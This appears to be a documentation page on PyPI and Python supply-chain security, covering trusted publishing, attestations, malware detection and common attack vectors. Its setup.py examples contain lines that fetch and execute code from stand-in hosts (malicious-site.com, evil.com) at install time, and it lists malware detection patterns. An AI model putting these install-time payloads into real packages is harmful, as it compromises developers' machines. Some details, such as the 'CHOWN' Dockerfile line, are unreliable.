PyPI/Python Ecosystem Security¶
PyPI Ecosystem Overview¶
Scale and Characteristics¶
PyPI serves the Python community with impressive scale and security-focused features:
- 400,000+ packages with steady, quality-focused growth
- ~6 billion downloads per month across all packages
- Trusted publishing with OIDC for secure package uploads
- Digital attestations for package provenance verification
- Strong security policies and incident response procedures
PyPI Security Evolution¶
PyPI has undergone significant security improvements over recent years:
timeline
title PyPI Security Evolution
2018 : Legacy PyPI retirement
: Move to Warehouse (modern codebase)
: Basic 2FA support
2019 : Mandatory 2FA for critical projects
: Improved audit logging
: Security key support
2020 : API token system
: Enhanced monitoring
: Vulnerability reporting program
2021 : Malware detection system
: Improved package scanning
: Security policies enforcement
2022 : Trusted publishing (OIDC)
: Digital attestations
: Enhanced threat intelligence
2023 : Comprehensive attestation support
: Advanced security analytics
: Ecosystem-wide security improvements
Trusted Publishing: PyPI's Security Innovation¶
What is Trusted Publishing?¶
Trusted publishing uses OpenID Connect (OIDC) to establish cryptographic trust between PyPI and external systems like GitHub Actions, eliminating the need for long-lived API tokens.
sequenceDiagram
participant GHA as GitHub Actions
participant OIDC as GitHub OIDC Provider
participant PyPI as PyPI
participant Package as Package Registry
Note over GHA,Package: Trusted Publishing Flow
GHA->>OIDC: Request OIDC token for workflow
OIDC->>GHA: Return signed JWT token
GHA->>PyPI: Present OIDC token for authentication
PyPI->>OIDC: Verify token signature and claims
OIDC->>PyPI: Token validation response
PyPI->>PyPI: Check token claims against project configuration
PyPI->>GHA: Grant publish permissions
GHA->>Package: Upload package with verified identity
Benefits of Trusted Publishing¶
- No Long-lived Secrets: Eliminates API tokens in CI/CD environments
- Cryptographic Trust: Uses public key cryptography for verification
- Granular Permissions: Specific repository and workflow authorization
- Audit Trail: Complete logging of publishing actions
- Reduced Attack Surface: No credentials to steal or compromise
Setting Up Trusted Publishing¶
# .github/workflows/publish.yml
name: Publish to PyPI
on:
release:
types: [published]
jobs:
publish:
runs-on: ubuntu-latest
permissions:
id-token: write # Required for OIDC token
contents: read
steps:
- uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.x'
- name: Install build dependencies
run: python -m pip install build
- name: Build package
run: python -m build
- name: Publish to PyPI
uses: pypa/gh-action-pypi-publish@release/v1
# No API token needed with trusted publishing!
PyPI Project Configuration:
# Configure trusted publishing on PyPI
1. Go to PyPI project management page
2. Add GitHub as trusted publisher
3. Specify: owner/repository, workflow filename, environment (optional)
4. No API token configuration needed
Digital Attestations and Provenance¶
Package Attestations¶
PyPI supports digital attestations that provide cryptographic proof of package origins:
{
"_type": "https://in-toto.io/Statement/v0.1",
"subject": [
{
"name": "my_package-1.0.0-py3-none-any.whl",
"digest": {
"sha256": "abcd1234..."
}
}
],
"predicateType": "https://slsa.dev/provenance/v0.2",
"predicate": {
"builder": {
"id": "https://github.com/actions/runner/github-hosted"
},
"buildType": "https://github.com/actions/workflow@v1",
"invocation": {
"configSource": {
"uri": "git+https://github.com/owner/repo@refs/heads/main",
"digest": {
"sha1": "def5678..."
}
}
},
"metadata": {
"buildInvocationId": "123456789",
"buildStartedOn": "2023-01-01T00:00:00Z"
}
}
}
Verifying Attestations¶
# Install verification tools
pip install sigstore
# Verify package attestations
python -m sigstore verify identity \
--cert-identity https://github.com/owner/repo/.github/workflows/publish.yml@refs/heads/main \
--cert-oidc-issuer https://token.actions.githubusercontent.com \
package.whl package.whl.sig
PyPI Security Features¶
1. Multi-Factor Authentication¶
PyPI requires 2FA for maintainers of critical projects:
# Enable 2FA on PyPI account
1. Visit PyPI account settings
2. Add authentication application (TOTP)
3. Add security keys (FIDO2/WebAuthn) - recommended
4. Download recovery codes
# Critical projects automatically require 2FA
# Affects ~4,000 projects covering ~90% of PyPI downloads
2. API Token Security¶
PyPI provides scoped API tokens with limited permissions:
# Create scoped API token
1. Generate token with specific project scope
2. Set token expiration date
3. Limit token to specific actions (upload only)
4. Use token in CI/CD instead of password
# Token format provides metadata
pypi-AgEIcHlwaS5vcmcCJDAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMAACKlsxLCJwcm9qZWN0LXJlYWQiXQAABiAJYWJjZGVmZ2hpams...
3. Malware Detection¶
PyPI implements automated malware detection:
# Example malware patterns PyPI detects
suspicious_patterns = [
"eval(base64.b64decode(", # Base64 encoded execution
"exec(compile(", # Dynamic compilation
"__import__('os').system(", # OS command execution
"socket.socket(", # Network connections
"subprocess.Popen(", # Process spawning
]
# PyPI scanning process
1. Automated scanning of all uploaded packages
2. Machine learning-based malware detection
3. Human review for suspicious packages
4. Rapid response for confirmed malware
4. Package Integrity¶
PyPI ensures package integrity through multiple mechanisms:
# SHA256 hashes for all files
https://files.pythonhosted.org/packages/a1/b2/c3.../package-1.0.0.tar.gz
# Hash: sha256:abcd1234efgh5678ijkl9012mnop3456qrst7890uvwx1234yz567890
# Package verification
pip install package==1.0.0 --hash=sha256:abcd1234efgh5678ijkl9012mnop3456qrst7890uvwx1234yz567890
Python Package Installation Security¶
pip Installation Process¶
Understanding pip's installation process reveals security considerations:
# pip install security analysis
1. Resolve package dependencies from PyPI
2. Download package files (wheel or source)
3. Verify package integrity (SHA256)
4. Install package files
5. Execute setup.py (for source distributions)
6. Run post-install scripts if present
Security Implications¶
# setup.py can execute arbitrary code
from setuptools import setup
import os
import subprocess
# This code runs during installation!
os.system("curl -s malicious-site.com/script.sh | bash")
setup(
name="malicious-package",
version="1.0.0",
# ... package configuration
)
Secure Installation Practices¶
# Use specific versions and hashes
pip install package==1.0.0 --hash=sha256:known_good_hash
# Install from wheels when possible (no setup.py execution)
pip install package --only-binary=all
# Use virtual environments for isolation
python -m venv myenv
source myenv/bin/activate
pip install package
# Check package before installation
pip download package
# Inspect contents before installing
Common PyPI Attack Vectors¶
1. Typosquatting¶
Despite security measures, typosquatting remains a concern:
# Legitimate packages vs malicious variants
requests -> request, requsts, reqeusts
numpy -> nympy, numpi, numpy-dev
django -> djago, django-admin, djangos
flask -> falsk, flask-login, flasks
2. Dependency Confusion¶
Exploiting package name resolution:
# Example attack scenario
# 1. Attacker identifies internal package name
# 2. Publishes package with same name to PyPI
# 3. Developer accidentally installs public version
# Protection: Use private package index
pip install package --index-url https://private-pypi.company.com/
3. Setup.py Exploitation¶
Malicious code in setup.py files:
# Example malicious setup.py
from setuptools import setup
import base64
import urllib.request
# Download and execute malicious payload
payload = urllib.request.urlopen('https://evil.com/payload.py').read()
exec(compile(base64.b64decode(payload), '<string>', 'exec'))
setup(name='innocent-package', version='1.0.0')
4. Package Takeover¶
Compromising existing packages:
- Account compromise: Stealing maintainer credentials
- Social engineering: Convincing maintainers to add attackers
- Package abandonment: Taking over unmaintained packages
- Transfer exploitation: Exploiting package ownership transfers
Advanced PyPI Security¶
1. Private Package Repositories¶
Setting up secure private PyPI repositories:
# Using devpi for private PyPI
pip install devpi-server devpi-client
# Start devpi server
devpi-server --start
# Configure client
devpi use http://localhost:3141
devpi user -c testuser password=123
devpi login testuser
devpi index -c dev
# Upload private packages
devpi upload
2. Package Verification Scripts¶
#!/usr/bin/env python3
"""
PyPI Package Security Verification Script
"""
import requests
import hashlib
import json
import zipfile
import ast
import re
from pathlib import Path
class PyPISecurityVerifier:
def __init__(self):
self.suspicious_patterns = [
r'eval\s*\(',
r'exec\s*\(',
r'__import__\s*\(',
r'subprocess\.',
r'os\.system',
r'socket\.socket',
r'urllib\.request',
r'base64\.b64decode',
]
def check_package_metadata(self, package_name):
"""Check package metadata for suspicious indicators."""
url = f"https://pypi.org/pypi/{package_name}/json"
response = requests.get(url)
if response.status_code != 200:
return {"error": "Package not found"}
data = response.json()
info = data['info']
# Security checks
checks = {
"package_age": self._check_package_age(data),
"maintainer_count": len(info.get('maintainer_email', '').split(',')),
"download_stats": self._get_download_stats(package_name),
"version_frequency": self._check_version_frequency(data),
"has_source_distribution": self._has_source_distribution(data),
}
return checks
def analyze_source_code(self, package_path):
"""Analyze package source code for suspicious patterns."""
suspicious_files = []
for py_file in Path(package_path).rglob("*.py"):
with open(py_file, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
# Check for suspicious patterns
for pattern in self.suspicious_patterns:
if re.search(pattern, content):
suspicious_files.append({
"file": str(py_file),
"pattern": pattern,
"line": self._find_line_number(content, pattern)
})
return suspicious_files
def verify_package_integrity(self, package_name, version):
"""Verify package integrity using PyPI checksums."""
url = f"https://pypi.org/pypi/{package_name}/{version}/json"
response = requests.get(url)
data = response.json()
files = data['urls']
verification_results = []
for file_info in files:
file_url = file_info['url']
expected_hash = file_info['digests']['sha256']
# Download and verify
file_response = requests.get(file_url)
actual_hash = hashlib.sha256(file_response.content).hexdigest()
verification_results.append({
"filename": file_info['filename'],
"expected_hash": expected_hash,
"actual_hash": actual_hash,
"verified": expected_hash == actual_hash
})
return verification_results
def _check_package_age(self, data):
# Implementation details...
pass
def _get_download_stats(self, package_name):
# Implementation details...
pass
# Usage example
verifier = PyPISecurityVerifier()
results = verifier.check_package_metadata("requests")
print(json.dumps(results, indent=2))
3. Dependency Pinning and Lock Files¶
# requirements.txt with hashes
requests==2.31.0 \
--hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f \
--hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1
# Using pip-tools for dependency management
pip install pip-tools
# Create requirements.in
echo "requests" > requirements.in
# Generate locked requirements with hashes
pip-compile --generate-hashes requirements.in
# Install with verification
pip-sync requirements.txt
4. CI/CD Security for Python Projects¶
# Secure Python CI/CD pipeline
name: Python Security Pipeline
on: [push, pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install security tools
run: |
pip install safety bandit semgrep
- name: Check for known vulnerabilities
run: |
# Check for vulnerable packages
safety check
- name: Static security analysis
run: |
# Security linting with bandit
bandit -r src/
- name: Semantic security analysis
run: |
# Advanced pattern matching
semgrep --config=auto src/
- name: Dependency analysis
run: |
# Generate and check SBOM
pip install cyclonedx-bom
cyclonedx-py -o sbom.json
- name: Upload SBOM
uses: actions/upload-artifact@v3
with:
name: python-sbom
path: sbom.json
PyPI vs Other Ecosystems¶
Security Feature Comparison¶
Feature | PyPI | npm | Maven Central | NuGet |
---|---|---|---|---|
Trusted Publishing | ✅ Full OIDC support | ❌ Not available | ❌ Not available | ❌ Not available |
Digital Attestations | ✅ Full support | 🔶 Experimental | ❌ Not available | ❌ Not available |
Mandatory 2FA | ✅ Critical projects | 🔶 High-impact packages | ❌ Optional | ❌ Optional |
Malware Detection | ✅ Automated + manual | 🔶 Basic detection | 🔶 Basic scanning | 🔶 Basic scanning |
Package Signing | ✅ Built-in attestations | 🔶 Experimental | ✅ PGP signing | ✅ Code signing |
What Other Ecosystems Can Learn¶
- Trusted Publishing Model: Eliminates long-lived secrets in CI/CD
- Proactive Security Policies: Mandatory 2FA for critical projects
- Comprehensive Attestations: Full provenance tracking
- Community Engagement: Active security community involvement
- Rapid Incident Response: Quick response to security issues
Developer Environment Protection¶
1. Virtual Environment Security¶
# Secure virtual environment practices
python -m venv --prompt="secure-project" venv
source venv/bin/activate
# Verify environment isolation
which python
which pip
# Install with verification
pip install --require-hashes -r requirements.txt
# Regular environment cleanup
deactivate
rm -rf venv
2. Package Installation Monitoring¶
# Monitor package installations
import sys
import importlib.util
from functools import wraps
def monitor_imports(func):
@wraps(func)
def wrapper(*args, **kwargs):
if args and isinstance(args[0], str):
package_name = args[0]
print(f"🔍 Importing package: {package_name}")
# Check for suspicious packages
if is_suspicious_package(package_name):
print(f"⚠️ Warning: Suspicious package detected: {package_name}")
return func(*args, **kwargs)
return wrapper
# Patch import mechanism
original_import = __builtins__.__import__
__builtins__.__import__ = monitor_imports(original_import)
3. Sandboxed Development¶
# Using containers for Python development
# Dockerfile.python-dev
FROM python:3.11-slim
# Create non-root user
RUN useradd -m -u 1000 developer
# Install security tools
RUN pip install safety bandit
# Set up workspace
WORKDIR /workspace
CHOWN developer:developer /workspace
# Switch to non-root user
USER developer
# Entry point
CMD ["bash"]
Incident Response: PyPI Security Breaches¶
Historical Incidents¶
- 2019 - Jellyfish Package: Cryptocurrency miner in package
- 2020 - Python Package Backdoor: Banking trojan distribution
- 2021 - Dependency Confusion: Major companies affected
- 2022 - Crypto Package Attacks: Multiple malicious packages
PyPI's Response Improvements¶
- Automated Detection: Machine learning-based malware detection
- Rapid Response: Sub-hour response times for confirmed threats
- Community Reporting: Easy reporting mechanisms for users
- Transparency: Public incident reports and lessons learned
Lessons for Organizations¶
# PyPI Incident Response Lessons
## Prevention
- Implement trusted publishing where possible
- Use package verification and attestations
- Maintain comprehensive package inventories
- Regular security training for developers
## Detection
- Monitor package installations and updates
- Implement SBOM tracking and analysis
- Use automated vulnerability scanning
- Establish baseline behavior patterns
## Response
- Have pre-planned incident response procedures
- Maintain communication channels with package maintainers
- Implement rapid rollback capabilities
- Document lessons learned for future improvement
Future of PyPI Security¶
Ongoing Initiatives¶
- SLSA Framework Integration: Enhanced supply chain security standards
- Sigstore Adoption: Keyless signing for all packages
- Machine Learning Enhancement: Improved threat detection
- Cross-Ecosystem Collaboration: Sharing security innovations
Recommended Practices¶
- Adopt Trusted Publishing: Eliminate long-lived tokens
- Verify Attestations: Check package provenance
- Use Security Tools: Integrate safety, bandit, and others
- Stay Informed: Follow PyPI security announcements
- Contribute Back: Report issues and improve ecosystem security
Conclusion¶
PyPI has emerged as a security leader in the package ecosystem space, demonstrating how proactive security measures can significantly improve ecosystem security. Key innovations include:
- Trusted Publishing: Eliminating long-lived secrets
- Digital Attestations: Cryptographic provenance verification
- Proactive Policies: Mandatory 2FA for critical projects
- Community Engagement: Active security community involvement
The next section covers Maven/Java Ecosystem Security, which has its own unique security characteristics and challenges.